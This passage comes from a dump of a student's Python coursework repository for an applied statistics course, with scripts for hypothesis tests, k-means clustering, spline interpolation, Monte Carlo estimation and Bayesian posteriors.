marker='o', linestyle='none', label='A10')\nplt.plot(BE_Adjo_2009_value, diff_BE_AdjO, alpha=0.5, color='m', markeredgecolor='black', marker='o', linestyle='none', label='BE')\n\nplt.title(\"AdjO difference for teams in 6 conferences in both 2009 and 2014 datasets\")\n\n\n\nplt.ylabel('AdjO difference (2014-2009)')\nplt.xlabel('2009 AdjO value')\n\nplt.legend()\nplt.show()\n\nACC_mean = np.mean(diff_ACC_AdjO)\nACC_median = np.median(diff_ACC_AdjO)\nprint(\"Mean for ACC is: %8.2f\" % (ACC_mean))\nprint(\"Median for ACC is: %8.2f\" % (ACC_median))\n\nSEC_mean = np.mean(diff_SEC_AdjO)\nSEC_median = np.median(diff_SEC_AdjO)\nprint(\"Mean for SEC is: %8.2f\" % (SEC_mean))\nprint(\"Median for SEC is: %8.2f\" % (SEC_median))\n\nB10_mean = np.mean(diff_B10_AdjO)\nB10_median = np.median(diff_B10_AdjO)\nprint(\"Mean for B10 is: %8.2f\" % (B10_mean))\nprint(\"Median for B10 is: %8.2f\" % (B10_median))\n\nBSky_mean = np.mean(diff_BSky_AdjO)\nBSky_median = np.median(diff_BSky_AdjO)\nprint(\"Mean for BSky is: %8.2f\" % (BSky_mean))\nprint(\"Median for BSky is: %8.2f\" % (BSky_median))\n\nA10_mean = np.mean(diff_A10_AdjO)\nA10_median = np.median(diff_A10_AdjO)\nprint(\"Mean for A10 is: %8.2f\" % (A10_mean))\nprint(\"Median for A10 is: %8.2f\" % (A10_median))\n\nBE_mean = np.mean(diff_BE_AdjO)\nBE_median = np.median(diff_BE_AdjO)\nprint(\"Mean for BE is: %8.2f\" % (BE_mean))\nprint(\"Median for BE is: %8.2f\" % (BE_median))\n\nrest_mean = np.mean(diff_rest_AdjO)\nrest_median = np.median(diff_rest_AdjO)\nprint(\"Mean for rest is: %8.2f\" % (rest_mean))\nprint(\"Median for rest is: %8.2f\" % (rest_median))\n" }, { "alpha_fraction": 0.4942112863063812, "alphanum_fraction": 0.5466715097427368, "avg_line_length": 27.17346954345703, "blob_id": "d47b124fc7121dec00f8e05a1a56cfe21b969625", "content_id": "7b2c2d2c60d7057dd4f5e92fac8ba9326593b03f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2764, "license_type": "no_license", "max_line_length": 78, "num_lines": 98, "path": "/Problem_set_2/problem_5.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy import special\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom scipy.stats import chisquare, chi2\n\n\ndef expected_pdf(X, t):\n b, sigma = X\n\n temp1 = np.exp(-(2 * b * t - sigma ** 2) / (2 * b ** 2))\n temp2 = special.erf((b * t - sigma ** 2) / (np.sqrt(2) * b * sigma)) + 1\n temp3 = (2 * b)\n pdf = (temp1 * temp2) / temp3\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\ndef test_pdf(X, t):\n b, sigma = X\n\n temp1 = np.exp(-(2 * b * t - sigma ** 2) / (2 * b ** 2))\n temp2 = special.erf((b * t - sigma ** 2) / (np.sqrt(2) * b * sigma)) + 1\n temp3 = (2 * b)\n pdf = (temp1 * temp2) / temp3\n\n return pdf\n\n\nfnames = 'ProblemSet2_Prob5_NucData.txt'\ndata = np.loadtxt(fnames)\ndata = data.reshape((100, 200))\n\nh_0 = []\nh_1 = []\n\nfor i in range(data.shape[0]):\n z = data[i, :]\n print(z.shape)\n\n result_1 = minimize(expected_pdf, [1, 1], args=(z), method='SLSQP',\n bounds=((1, 1), (1e-10, None)))\n result_2 = minimize(expected_pdf, [1, 1], args=(z), method='SLSQP',\n bounds=((1e-10, None), (1e-10, None)))\n\n h_0 = np.append(h_0, -result_1.fun)\n h_1 = np.append(h_1, -result_2.fun)\n\nratio = -2 * (h_0 - h_1)\n\n\nprint('Number of values in array larger than 2.706 is: %.2f'\n % len(ratio[ratio > 2.706]))\n\nbinwidth = 1\nn_bins = np.arange(min(ratio), max(ratio) + binwidth, binwidth)\nprint(n_bins)\nplt.figure()\nobserved_values, bins, _ = plt.hist(ratio, bins=n_bins,\n label='-2ln($\\lambda$)')\nplt.xlabel('-2ln($\\lambda$)')\nplt.ylabel('Count')\nplt.legend()\nplt.savefig('lnlikelihoods', dpi=200)\n\nexpected_values = [(special.erf(np.sqrt((i + 1) / 2)) -\n special.erf(np.sqrt(i / 2))) * 100\n for i in range(8)]\n\nprint(observed_values)\nprint(expected_values)\nprint(chisquare(observed_values, f_exp=expected_values))\nprint('Threshold value ', chi2.isf(0.05, 7))\n\n##############################################################################\nz = data.flatten()\n\nresult_1 = minimize(expected_pdf, [1, 1], args=(z), method='SLSQP',\n bounds=((1.05, 1.05), (1e-10, None)))\nresult_2 = minimize(expected_pdf, [1, 1], args=(z), method='SLSQP',\n bounds=((1e-10, None), (1e-10, None)))\n\nh_0 = []\nh_1 = []\nh_0 = np.append(h_0, -result_1.fun)\nh_1 = np.append(h_1, -result_2.fun)\nratio = -2 * (h_0 - h_1)\n\nx = np.arange(-2.5, 10, 0.1)\nplt.figure()\nprint(result_1.x, result_2.x)\nplt.plot(x, test_pdf(result_1.x, x), label='$H_0$')\nplt.plot(x, test_pdf(result_2.x, x), label='$H_1$')\nplt.hist(z, density=True, bins=100, label='Data')\nplt.legend()\nplt.xlabel('t')\nplt.savefig('data_h0h1', dpi=200)\nplt.show()\n\n\n\n" }, { "alpha_fraction": 0.5418312549591064, "alphanum_fraction": 0.5754637718200684, "avg_line_length": 28.515901565551758, "blob_id": "c7e1748381ed6855c962450773e29c84a766203f", "content_id": "4830468cd93f5e1c4c081cc01062f78b71c0299b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8355, "license_type": "no_license", "max_line_length": 107, "num_lines": 283, "path": "/Project/k_means_clustering_illustration.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport struct\nimport time\n\n\n# I stole this function from the interwebz\ndef loadlocal_mnist(images_path, labels_path):\n \"\"\" Read MNIST from ubyte files.\n Parameters\n ----------\n images_path : str\n path to the test or train MNIST ubyte file\n labels_path : str\n path to the test or train MNIST class labels file\n Returns\n --------\n images : [n_samples, n_pixels] numpy.array\n Pixel values of the images.\n labels : [n_samples] numpy array\n Target class labels\n Examples\n -----------\n For usage examples, please see\n http://rasbt.github.io/mlxtend/user_guide/data/loadlocal_mnist/\n \"\"\"\n with open(labels_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II',\n lbpath.read(8))\n labels = np.fromfile(lbpath,\n dtype=np.uint8)\n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack(\">IIII\",\n imgpath.read(16))\n images = np.fromfile(imgpath,\n dtype=np.uint8).reshape(len(labels), 784)\n\n return images, labels\n\n\ndef display_digit(data, index=None):\n '''\n Plots the digit on given index of data. If index is not given it assummes\n a single line a data.\n '''\n if index is not None:\n plt.imshow(data[index, 2::].reshape((28, 28)))\n else:\n plt.imshow(data[2::].reshape((28, 28)))\n\n\ndef init_centroids(data, n):\n \"\"\"\n Returns random initial centroids from data.\n \"\"\"\n index = np.random.randint(len(data), size=(n))\n init_cent = data[index, :]\n return init_cent\n\n\ndef dist_centroids(data, cent):\n '''\n Returns the distance between each point (each row in data) and centroids\n '''\n dist = []\n for i in range(cent.shape[0]):\n temp = np.linalg.norm(data[:, 2::] - cent[i, 2::], axis=1)\n dist = np.append(dist, temp)\n dist = dist.reshape((cent.shape[0], data.shape[0])).T\n return dist\n\n\ndef label_centroids(data, dist):\n '''\n Adds Label to data according to its closest centroid\n '''\n new_data = np.copy(data)\n temp = np.argmin(dist, axis=1) + 1\n new_data[:, 0] = temp\n return new_data\n\n\ndef new_centroids(data, cent):\n '''\n Calculates the new centroids from data with same label\n '''\n new_cent = np.copy(cent)\n for i in range(new_cent.shape[0]):\n new = np.average(data[data[:, 0] == i + 1][:, 2::], axis=0)\n new_cent[i, 2::] = new\n\n return new_cent\n\n\ndef label_clusters(data, cent, n):\n '''\n Finds most common label in cluster and sets cluster label\n '''\n for i in range(n):\n temp = data[data[:, 0] == i + 1]\n if len(temp) == 0:\n continue\n\n temp1 = temp[:, 1].astype(int)\n label = np.bincount(temp1).argmax()\n cent[i, 0] = label\n\n return cent\n\n\ndef classify(to_be_classified, cent):\n\n dist = []\n for i in range(cent.shape[0]):\n temp = np.linalg.norm(to_be_classified[:, 2::] - cent[i, 2::], axis=1)\n dist = np.append(dist, temp)\n dist = dist.reshape((cent.shape[0], to_be_classified.shape[0])).T\n temp = np.argmin(dist, axis=1)\n\n to_be_classified[:, 0] = cent[temp, 0]\n\n return to_be_classified\n\n\ndef get_accuracy(x, y):\n\n correct_classified = 0\n for i in range(len(x)):\n if x[i] == y[i]:\n correct_classified += 1\n accuracy = correct_classified / len(x)\n\n return accuracy\n\n\ndef K_means(data, n):\n '''\n Does k-means analysis\n '''\n previous_difference = 0\n centroids = init_centroids(data, n)\n c = 221\n while True:\n print(1)\n print(centroids.shape)\n if c < 225:\n plt.subplot(c)\n plt.scatter(data[data[:, 0] == 0][:, 2], data[data[:, 0] == 0][:, 3], c='purple', s=10)\n plt.scatter(data[data[:, 0] == 1][:, 2], data[data[:, 0] == 1][:, 3], c='red', s=10)\n plt.scatter(data[data[:, 0] == 2][:, 2], data[data[:, 0] == 2][:, 3], c='green', s=10)\n plt.scatter(data[data[:, 0] == 3][:, 2], data[data[:, 0] == 3][:, 3], c='blue', s=10)\n\n plt.scatter(centroids[0, 2], centroids[0, 3], marker='d', s=100, c='red', edgecolors='black')\n plt.scatter(centroids[1, 2], centroids[1, 3], marker='d', s=100, c='green', edgecolors='black')\n plt.scatter(centroids[2, 2], centroids[2, 3], marker='d', s=100, c='blue', edgecolors='black')\n\n distance_from_centroids = dist_centroids(data, centroids)\n data = label_centroids(data, distance_from_centroids)\n centroids_new = new_centroids(data, centroids)\n\n difference = centroids[:, 2::] - centroids_new[:, 2::]\n norm_difference = np.linalg.norm(difference, axis=1)\n\n largest_norm_difference = max(norm_difference)\n\n difference_change = abs((largest_norm_difference - previous_difference) /\n np.mean([largest_norm_difference, previous_difference])) * 100\n previous_difference = largest_norm_difference\n centroids = np.copy(centroids_new)\n print(difference_change)\n if np.isnan(difference_change):\n break\n c += 1\n\n centroids = label_clusters(data, centroids, n)\n\n return data, centroids\n\n\n# Read file\n# file_path = 'digit-recognizer/train.csv'\n\n# X_train, y_train_labels = loadlocal_mnist(\n# images_path='digit-recognizer/train-images-idx3-ubyte',\n# labels_path='digit-recognizer/train-labels-idx1-ubyte')\n\n# X_test, y_test_labels = loadlocal_mnist(\n# images_path='digit-recognizer/t10k-images-idx3-ubyte',\n# labels_path='digit-recognizer/t10k-labels-idx1-ubyte')\n\n# train = np.insert(X_train, 0, y_train_labels, axis=1)\n# train = np.insert(train, 0, np.zeros(train.shape[0]), axis=1)\n# train = train[:1000, :]\n\n# test = np.insert(X_test, 0, y_test_labels, axis=1)\n# test = np.insert(test, 0, np.zeros(test.shape[0]), axis=1)\n# test = test[:100, :]\n\n# print(train)\n# train, cent = K_means(train, 10)\n# print(train)\n# print(get_accuracy(train[:, 0], train[:, 1]))\n# data = pd.read_csv(file_path)\n# test = data.values\n# test = np.insert(test, 0, np.zeros(test.shape[0]), axis=1)\n# train = test[:40000, :]\n# to_test = test[40000:, :]\nnp.random.seed(6)\nA = np.random.normal(1, 0.1, (100, 2))\nA = np.insert(A, 0, np.zeros(A.shape[0]) + 1, axis=1)\n\n\n\nB = np.random.normal(2, 0.3, (100, 1))\nprint(B.shape)\ntemp = np.random.normal(1, 0.1, 100)\n\nB = np.insert(B, 0, temp, axis=1)\nprint(B.shape)\nB = np.insert(B, 0, np.zeros(B.shape[0]) + 2, axis=1)\nprint(B.shape)\n\n\n\nC = np.random.normal(1.5, 0.1, (100, 2))\nC = np.insert(C, 0, np.zeros(B.shape[0]) + 15, axis=1)\n\n\n\ntest = np.vstack((A, B))\ntest = np.vstack((test, C))\ntest = np.insert(test, 0, np.zeros(test.shape[0]), axis=1)\n\n\nmy_point = np.array([[-1, -1, 1, 2], [-1, -1, 1, 1], [-1, -1, 2, 2]])\n\n# print(test)\n\ntest, cent = K_means(test, 3)\nprint(test)\nprint(cent)\n# print(cent)\n# start = time.time()\n# classified = classify(my_point, cent)\n# end = time.time()\n# print(end - start)\n# print(get_accuracy(classified[:, 0], classified[:, 1]))\n\n# plt.scatter(test[:, 2], test[:, 3], c=test[:, 0])\n# plt.scatter(my_point[:, 2], my_point[:, 3], marker='d', s=100, label='my point')\n# plt.scatter(cent[0, 2], cent[0, 3], marker='x', label=str(cent[0,0]))\n# plt.scatter(cent[1, 2], cent[1, 3], marker='x', label=str(cent[1,0]))\n# plt.scatter(cent[2, 2], cent[2, 3], marker='x', label=str(cent[2,0]))\n# plt.scatter(cent[3, 2], cent[3, 3], marker='x', label=str(cent[3,0]))\n# plt.scatter(cent[4, 2], cent[4, 3], marker='x', label=str(cent[4,0]))\n# plt.legend()\nplt.show()\n\n\n\n# display_digit(data.iloc[0].values)\n# plt.figure()\n# display_digit(test, 0)\n# plt.show()\n\n\n# X = data.iloc[:, 1:].values\n# y = data.iloc[:, 0].values\n\n# X_train, X_test, y_train, y_test = train_test_split(X, y,\n# test_size=0.2,\n# random_state=42)\n\n# nr_unique_digits = len(np.unique(y_train))\n\n# kmeans = KMeans(n_clusters=50, random_state=0).fit(X_train)\n# predict_kmeans = kmeans.predict(X_test)\n\n# print(kmeans.labels_[0:20])\n# for i in range(10):\n# plt.figure()\n# plt.imshow(X_train[i, :].reshape((28, 28)))\n\n\n" }, { "alpha_fraction": 0.8040540814399719, "alphanum_fraction": 0.8040540814399719, "avg_line_length": 47.33333206176758, "blob_id": "1d59a4297ab1fa05112de343343b17c1c4afa3ed", "content_id": "2ab516cd19c79cafe955f1411633cf25c35f1269", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 148, "license_type": "no_license", "max_line_length": 102, "num_lines": 3, "path": "/readme.md", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "# Advanced Methods in Applied Statistics\n\nThis is all the code that i created while following the course Advanced Methods in Applied Statistics.\n\n\n\n" }, { "alpha_fraction": 0.6263269782066345, "alphanum_fraction": 0.6539278030395508, "avg_line_length": 21.380952835083008, "blob_id": "dc6fc6943033ff41988728820930f5fea8504451", "content_id": "2ce61d17dd7c724e6e6246947208e32b3dea2a9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 65, "num_lines": 21, "path": "/Week_2/Class_4/spline_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\n\nfname = 'DustLog_forClass.txt'\n\nloaded_file = np.loadtxt(fname)\n\nx = loaded_file[:, 0]\ny = loaded_file[:, 1]\n\nf = interp1d(x, y)\nf1 = interp1d(x, y, kind='cubic')\n\nx_new = np.linspace(min(x), max(x), len(x)*10000, endpoint=True)\n\nplt.plot(x, y, 'k', marker='o', markersize='2', linestyle='none')\nplt.plot(x, f(x), 'b', linestyle='--')\nplt.plot(x_new, f1(x_new), 'r')\n\nplt.show()\n\n" }, { "alpha_fraction": 0.5844686627388, "alphanum_fraction": 0.6103542447090149, "avg_line_length": 18.83783721923828, "blob_id": "0eedc0006d2938187f23b83acc58101b8c0374f9", "content_id": "ea8b8fd588b28e9c5c7b2f88c8bb7e69e783f2f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 734, "license_type": "no_license", "max_line_length": 58, "num_lines": 37, "path": "/Week_1/Class_2/mc_pi.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nrandom.seed(142)\n\n# Create my empty arrays\nx = np.empty((1, 0))\ny = np.empty((1, 0))\nN = 1000\n\nx_missed = np.empty((1, 0))\ny_missed = np.empty((1, 0))\n\n# Fill my arrays with random numbers\nfor i in range(N):\n\n x_random = random.random()\n y_random = random.random()\n if (np.sqrt(x_random**2 + y_random**2)) < 1:\n x = np.append(x, x_random)\n y = np.append(y, y_random)\n\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = np.append(y_missed, y_random)\n\n\n# Plot the numbers\nplt.plot(x, y, marker='o', linestyle='None')\nplt.plot(x_missed, y_missed, marker='.', linestyle='None')\n\nplt.show()\n\npi = len(x) / N * 4\n\nprint(pi)\n" }, { "alpha_fraction": 0.42036277055740356, "alphanum_fraction": 0.4443267583847046, "avg_line_length": 33.02252197265625, "blob_id": "2703854874b9f09523341cc7a26e438b0e0d5cf2", "content_id": "749fbdb9ec067c644766ff7c661e67bfb769b0c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7553, "license_type": "no_license", "max_line_length": 79, "num_lines": 222, "path": "/Exam_2019/Code/Problem_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import chisquare, chi2, kstest\n\n\ndef uniform_CDF(x, min, max):\n return (x - min) / (max - min)\n\n\nfname = 'Exam_2019_Problem2.txt'\ndata = np.loadtxt(fname, skiprows=2)\n\nazimuth_angle = data[:, 0]\nzenith_angle = np.cos(data[:, 1])\n\nnp.random.seed(421)\nuniform_azimuth = np.random.uniform(0, 2 * np.pi, len(azimuth_angle))\nuniform_zenith = np.random.uniform(-1, 1, len(zenith_angle))\n\n###############################################################################\nbinwidth = 1\nn_bins = np.arange(0, 2 * np.pi, binwidth)\n\nobserved_values, bins, _ = plt.hist(azimuth_angle,\n bins=n_bins,\n color='r',\n histtype='step',\n label='Azimuth Data',\n lw=2)\nexpected_values, bins, _ = plt.hist(uniform_azimuth,\n bins=n_bins,\n color='k',\n histtype='step',\n label='Monte Carlo Azimuth',\n lw=2)\nplt.legend()\nplt.show()\n\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values) - 1))\n\nprint('DF', len(expected_values) - 1)\n\nprint('KSTEST', kstest(azimuth_angle, lambda x: uniform_CDF(x, 0, 2 * np.pi)))\n\n\n###############################################################################\n\nbinwidth = 0.5\nn_bins = np.arange(-1, 1 + binwidth, binwidth)\n\nobserved_values1, bins, _ = plt.hist(zenith_angle,\n bins=n_bins,\n color='r',\n histtype='step',\n label='Zenith Data',\n lw=2)\nexpected_values1, bins, _ = plt.hist(uniform_zenith,\n bins=n_bins,\n color='k',\n histtype='step',\n label='Monte Carlo Zenith',\n lw=2)\nplt.legend()\nplt.show()\n\nprint(observed_values1)\nprint(expected_values1)\nmy_chi = chisquare(observed_values1,\n f_exp=expected_values1)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values1) - 1))\n\nprint('DF', len(expected_values1) - 1)\n\nprint('KSTEST', kstest(zenith_angle, lambda x: uniform_CDF(x, -1, 1)))\n\n\n###############################################################################\nprint('PRoblem B starts here')\nprint('H_A')\nuniform_azimuth_20 = np.random.uniform(0.225*np.pi, 0.55 * np.pi, 20)\nuniform_zenith_20 = np.cos(np.random.uniform(0.3*np.pi, np.pi, 20))\n\nuniform_azimuth_80 = np.random.uniform(0, 2 * np.pi, 80)\nuniform_zenith_80 = np.random.uniform(-1, 1, 80)\n\n\nuniform_azimuth = np.append(uniform_azimuth_20, uniform_azimuth_80)\nuniform_zenith = np.append(uniform_zenith_20, uniform_zenith_80)\n\nbinwidth = 1\nn_bins = np.arange(0, 2 * np.pi, binwidth)\n\nobserved_values, bins, _ = plt.hist(azimuth_angle,\n bins=n_bins,\n color='r',\n histtype='step',\n label='Azimuth Data',\n lw=2)\nexpected_values, bins, _ = plt.hist(uniform_azimuth,\n bins=n_bins,\n color='k',\n histtype='step',\n label='Monte Carlo Azimuth 80/20',\n lw=2)\nplt.legend()\nplt.show()\n\n\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values) - 1))\n\nprint('DF', len(expected_values) - 1)\n\n###############################################################################\n\nbinwidth = 0.5\nn_bins = np.arange(-1, 1 + binwidth, binwidth)\n\nobserved_values, bins, _ = plt.hist(zenith_angle,\n bins=n_bins,\n color='r',\n histtype='step',\n label='Zenith Data',\n lw=2)\nexpected_values, bins, _ = plt.hist(uniform_zenith,\n bins=n_bins,\n color='k',\n histtype='step',\n label='Monte Carlo Zenith 80/20',\n lw=2)\nplt.legend()\nplt.show()\n\n\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values) - 1))\n\nprint('DF', len(expected_values) - 1)\n\n###############################################################################\nprint('H_B')\nuniform_azimuth_20 = np.random.uniform(0, np.pi, 15)\nuniform_zenith_20 = np.cos(np.random.uniform(0.5*np.pi, np.pi, 15))\n\nuniform_azimuth_80 = np.random.uniform(0, 2 * np.pi, 85)\nuniform_zenith_80 = np.random.uniform(-1, 1, 85)\n\n\nuniform_azimuth = np.append(uniform_azimuth_20, uniform_azimuth_80)\nuniform_zenith = np.append(uniform_zenith_20, uniform_zenith_80)\n\nbinwidth = 1\nn_bins = np.arange(0, 2 * np.pi, binwidth)\n\nobserved_values, bins, _ = plt.hist(azimuth_angle,\n bins=n_bins,\n color='r',\n histtype='step',\n label='Azimuth Data',\n lw=2)\nexpected_values, bins, _ = plt.hist(uniform_azimuth,\n bins=n_bins,\n color='k',\n histtype='step',\n label='Monte Carlo Azimuth 85/15',\n lw=2)\nplt.legend()\nplt.show()\n\n\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values) - 1))\n\nprint('DF', len(expected_values) - 1)\n\n###############################################################################\n\nbinwidth = 0.5\nn_bins = np.arange(-1, 1 + binwidth, binwidth)\n\nobserved_values, bins, _ = plt.hist(zenith_angle,\n bins=n_bins,\n color='r',\n histtype='step',\n label='Zenith Data',\n lw=2)\nexpected_values, bins, _ = plt.hist(uniform_zenith,\n bins=n_bins,\n color='k',\n histtype='step',\n label='Monte Carlo Zenith 85/15',\n lw=2)\nplt.legend()\nplt.show()\n\n\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values) - 1))\n\nprint('DF', len(expected_values) - 1)\n" }, { "alpha_fraction": 0.6402156949043274, "alphanum_fraction": 0.6872110962867737, "avg_line_length": 29.186046600341797, "blob_id": "f459aedc41807b109c7444d46aa3e94dcdd83360", "content_id": "ff186936009ea89372acecf289de950f91815a28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1298, "license_type": "no_license", "max_line_length": 114, "num_lines": 43, "path": "/Week_2/Class_4/bayes_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n\nk = 10\nbig_k = 100\nn = 60\n\n\ndef my_binomial_coefficient(n, k):\n result = math.factorial(n) / (math.factorial(k) * math.factorial(n - k))\n return result\n\ndef my_hypergeo(k, K, n, N):\n result = my_binomial_coefficient(K, k) * my_binomial_coefficient(N - K, n - k) / my_binomial_coefficient(N, n)\n return result\n\n\nposterior_flat = np.array([])\nposterior_1overN = np.array([])\n\nfor i in np.arange(150, 2000):\n temp = my_hypergeo(k, big_k, n, i)\n posterior_flat = np.append(posterior_flat, temp)\n posterior_1overN = np.append(posterior_1overN, temp/i)\n\nk = 15\n\nposterior_flat_newk = np.array([])\nposterior_1overN_newk = np.array([])\n\nfor i in np.arange(150, 2000):\n temp = my_hypergeo(k, big_k, n, i)\n posterior_flat_newk = np.append(posterior_flat_newk, temp)\n posterior_1overN_newk = np.append(posterior_1overN_newk, temp/i)\n\nplt.plot(np.arange(150, 2000), posterior_flat/np.sum(posterior_flat), 'r')\nplt.plot(np.arange(150, 2000), posterior_1overN/np.sum(posterior_1overN), 'r', linestyle='dashed')\n\nplt.plot(np.arange(150, 2000), posterior_flat_newk/np.sum(posterior_flat_newk), 'b')\nplt.plot(np.arange(150, 2000), posterior_1overN_newk/np.sum(posterior_1overN_newk), 'b', linestyle='dashed')\nplt.show()\n" }, { "alpha_fraction": 0.5913461446762085, "alphanum_fraction": 0.6346153616905212, "avg_line_length": 12.933333396911621, "blob_id": "d22485f03289c7424a55578212c293a89e71ff84", "content_id": "5266b81f9f533e9c72e5b8d168bf28e2ad1870e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 208, "license_type": "no_license", "max_line_length": 41, "num_lines": 15, "path": "/Week_5/Class_9/exercise_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\n\n\nfor i in np.arange(0, 11, 0.05):\n my_lambda = i\n s = np.random.poisson(my_lambda, 100)\n\n\ny, x, _ = plt.hist(s)\nprint(x)\nprint(np.sum(y))\nplt.show()" }, { "alpha_fraction": 0.5830039381980896, "alphanum_fraction": 0.5997125506401062, "avg_line_length": 26.151220321655273, "blob_id": "c89a98787c7acf8a6aa08aee3b18536d8e0230ec", "content_id": "58db18b8300b96626747c036c4a9f1f507844844", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5566, "license_type": "no_license", "max_line_length": 81, "num_lines": 205, "path": "/Project/k_means_clustering.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport struct\nimport time\n\n\n# I stole this function from the interwebz\ndef loadlocal_mnist(images_path, labels_path):\n \"\"\" Read MNIST from ubyte files.\n Parameters\n ----------\n images_path : str\n path to the test or train MNIST ubyte file\n labels_path : str\n path to the test or train MNIST class labels file\n Returns\n --------\n images : [n_samples, n_pixels] numpy.array\n Pixel values of the images.\n labels : [n_samples] numpy array\n Target class labels\n Examples\n -----------\n For usage examples, please see\n http://rasbt.github.io/mlxtend/user_guide/data/loadlocal_mnist/\n \"\"\"\n with open(labels_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II',\n lbpath.read(8))\n labels = np.fromfile(lbpath,\n dtype=np.uint8)\n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack(\">IIII\",\n imgpath.read(16))\n images = np.fromfile(imgpath,\n dtype=np.uint8).reshape(len(labels), 784)\n\n return images, labels\n\n\ndef display_digit(data, index=None):\n '''\n Plots the digit on given index of data. If index is not given it assummes\n a single line a data.\n '''\n if index is not None:\n plt.imshow(data[index, 2::].reshape((28, 28)))\n else:\n plt.imshow(data[2::].reshape((28, 28)))\n\n\ndef init_centroids(data, n):\n \"\"\"\n Returns random initial centroids from data.\n \"\"\"\n index = np.random.randint(len(data), size=(n))\n init_cent = data[index, :]\n return init_cent\n\n\ndef dist_centroids(data, cent):\n '''\n Returns the distance between each point (each row in data) and centroids\n '''\n dist = []\n for i in range(cent.shape[0]):\n temp = np.linalg.norm(data[:, 2::] - cent[i, 2::], axis=1)\n dist = np.append(dist, temp)\n dist = dist.reshape((cent.shape[0], data.shape[0])).T\n return dist\n\n\ndef label_centroids(data, dist):\n '''\n Adds Label to data according to its closest centroid\n '''\n new_data = np.copy(data)\n temp = np.argmin(dist, axis=1) + 1\n new_data[:, 0] = temp\n return new_data\n\n\ndef new_centroids(data, cent):\n '''\n Calculates the new centroids from data with same label\n '''\n new_cent = np.copy(cent)\n for i in range(new_cent.shape[0]):\n new = np.average(data[data[:, 0] == i + 1][:, 2::], axis=0)\n new_cent[i, 2::] = new\n\n return new_cent\n\n\ndef label_clusters(data, cent, n):\n '''\n Finds most common label in cluster and sets cluster label\n '''\n for i in range(n):\n temp = data[data[:, 0] == i + 1]\n if len(temp) == 0:\n continue\n\n temp1 = temp[:, 1].astype(int)\n label = np.bincount(temp1).argmax()\n cent[i, 0] = label\n return cent\n\n\ndef classify(to_be_classified, cent):\n\n dist = []\n classified = np.copy(to_be_classified)\n print(cent)\n for i in range(cent.shape[0]):\n temp = np.linalg.norm(to_be_classified[:, 2::] - cent[i, 2::], axis=1)\n dist = np.append(dist, temp)\n dist = dist.reshape((cent.shape[0], to_be_classified.shape[0])).T\n temp = np.argmin(dist, axis=1)\n\n classified[:, 0] = cent[temp, 0]\n\n return classified\n\n\ndef get_accuracy(x, y):\n\n correct_classified = 0\n for i in range(len(x)):\n if x[i] == y[i]:\n correct_classified += 1\n accuracy = correct_classified / len(x)\n\n return accuracy\n\n\ndef K_means(data, n):\n '''\n Does k-means analysis\n '''\n previous_difference = 0\n centroids = init_centroids(data, n)\n\n for _ in range(20):\n print(1)\n distance_from_centroids = dist_centroids(data, centroids)\n data = label_centroids(data, distance_from_centroids)\n centroids_new = new_centroids(data, centroids)\n\n difference = centroids[:, 2::] - centroids_new[:, 2::]\n norm_difference = np.linalg.norm(difference, axis=1)\n largest_norm_difference = 